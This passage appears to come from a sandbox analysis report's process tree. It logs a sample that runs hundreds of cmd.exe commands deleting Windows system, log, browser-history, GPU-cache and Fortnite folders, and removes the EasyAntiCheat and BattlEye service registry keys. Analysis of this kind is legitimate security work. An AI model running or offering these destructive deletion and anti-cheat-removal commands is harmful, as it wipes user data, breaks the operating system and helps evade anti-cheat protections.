    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:3904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:5604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive
    3⤵
    PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\Public\Documents
    3⤵
    PID:5692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:5764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:5640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:3904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:5864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\XboxLive\*.*
    3⤵
    PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:6064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IEDownloadHistory
    3⤵
    PID:5784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatUaCache
    3⤵
    PID:5904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatCache
    3⤵
    PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\DNTException
    3⤵
    PID:4696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE
    3⤵
    PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:5696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History\Low
    3⤵
    PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState
    3⤵
    PID:6052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\EcsCache0
    3⤵
    PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState
    3⤵
    PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3
    3⤵
    PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\Intel
    3⤵
    PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\EpicGamesLauncher
    3⤵
    PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngine
    3⤵
    PID:5572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngineLauncher
    3⤵
    PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD
    3⤵
    PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\INTEL
    3⤵
    PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\ntuser.ini
    3⤵
    PID:5516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache
    3⤵
    PID:5404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\System Volume Information\IndexerVolumeGuid
    3⤵
    PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0
    3⤵
    PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v3.0
    3⤵
    PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Internet Explorer\Recovery
    3⤵
    PID:5276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds
    3⤵
    PID:272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Windows\System32\restore\MachineGuid.txt
    3⤵
    PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\ProgramData\Microsoft\Windows\WER
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\Public\Libraries
    3⤵
    PID:5328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\MSOCache
    3⤵
    PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache
    3⤵
    PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    3⤵
    PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\ConnectedDevicesPlatform\L.%username%\ActivitiesCache.db-wal
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs\User
    3⤵
    PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp
    3⤵
    PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\cache\qtshadercache
    3⤵
    PID:5452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\UsrClass.dat.log2
    3⤵
    PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\VkCache
    3⤵
    PID:5644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\CN\NewsFeed
    3⤵
    PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\RHKRUA8J
    3⤵
    PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
    3⤵
    PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Temp
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp
    3⤵
    PID:5724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:2276
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      PID:5328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:288
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:3152
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:1304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\INF
    3⤵
    PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\Public\Documents
    3⤵
    PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch
    3⤵
    PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:5656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp
    3⤵
    PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:3904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:6064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\Intel
    3⤵
    PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:5256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:5584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\INF
    3⤵
    PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\Public\Documents
    3⤵
    PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\Prefetch
    3⤵
    PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\temp
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5692
- - C:\Windows\system32\cmd.exe
